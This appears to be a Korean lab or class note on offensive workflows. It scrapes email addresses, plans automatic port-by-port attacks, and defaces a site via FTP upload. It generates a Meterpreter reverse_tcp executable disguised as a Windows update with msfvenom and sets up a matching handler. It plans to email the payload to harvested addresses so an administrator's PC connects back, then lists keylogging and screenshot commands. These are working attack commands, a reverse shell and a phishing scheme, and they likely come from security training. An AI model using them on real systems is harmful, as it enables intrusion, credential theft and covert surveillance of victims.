#20250120
이메일 수집하는 파이썬 코드 작성
웹 처리를 위해 필요한 모듈
import requests
from bs4 import BeautifulSoup
requests 모듈의 text 함수 : 서버로부터 수신한 내용을 표시하는 코드
정규표현식 with 파이썬
import re
이메일
email_pattern=r'[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}'
emails=re.findall(email_pattern,soup.text)
kali > nano attack.py
> python attack.py
공격을 한 후 elasricsearch에서 로그를 확인해보니, user_agent.original 값이 python-requests/2.31.0으로 되어있는 것을 확인할 수 있다.
-----
같은 이메일을 여러개 등록 한 후 겹치는 메일은 중복이 되지 않고 한번만 출력되도록 설정.
열려있는 포트 스캔 후 자동으로 그 포트별로 공격하는 프로그램 작성.
1. 스캔
2. 포트 탐색
3. 80이면 http 공격 > 로그인, 파일 업로드, SQL 인젝션, XSS
4. 22면 ssh 공격
5. 21이면 ftp 공격
1) ftp 공격
import ftplib import FTP
1-1) ftp 공격 후 해커가 만든 profile.php를 업로드 하여 웹페이지 변경하기.
1-2) 수집된 이메일로 악성코드 보내기
-악성코드 생성
kali > msfvenom --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=4444 -b "\x00" -f exe > /home/kali/windows_update_20250120.exe
4444 포트 오픈
cd /home/kali
> nano malware.rc
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.56.101
set lport 4444
exploit
실행 > msfconsole -r malware.rc
생성한 악성코드(windows_update_20250120.exe)를 관리자 PC에 메일로 보내서 다운로드 받고 실행시키면, 칼리에서 관리자PC에 연결된다.
키로그(KeyLog)와 화면캡처 기능 등이 존재.
주 명령어
keyboard_send
keyevent
keyscan_dump
kayscan_start
keyscan_stop
mouse
screenshare
screenshot
setdesktop
uictl
화면 캡처 실행
> screenshot
결과
